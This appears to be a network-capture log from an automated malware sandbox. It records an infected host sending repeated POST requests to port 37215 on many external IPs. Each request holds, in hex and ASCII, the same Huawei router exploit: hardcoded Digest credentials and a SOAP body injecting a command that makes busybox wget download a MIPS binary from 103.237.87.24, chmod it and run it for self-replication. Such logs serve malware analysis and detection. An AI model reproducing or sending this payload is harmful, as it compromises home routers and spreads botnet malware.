                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  702192.168.2.133923467.139.65.17437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.309197903 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  703192.168.2.1353364157.230.12.18037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.309228897 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  704192.168.2.1349380157.240.19.24537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.309230089 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  705192.168.2.135312646.39.105.9137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.309236050 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  706192.168.2.1342282197.158.66.11637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.309250116 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  707192.168.2.1347284194.154.163.3837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.309267044 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  708192.168.2.1342196162.20.86.17737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.309268951 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  709192.168.2.1355858157.47.104.20337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.313204050 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  710192.168.2.134160641.227.182.8337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.313246012 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  711192.168.2.135792641.201.2.3437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.313250065 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 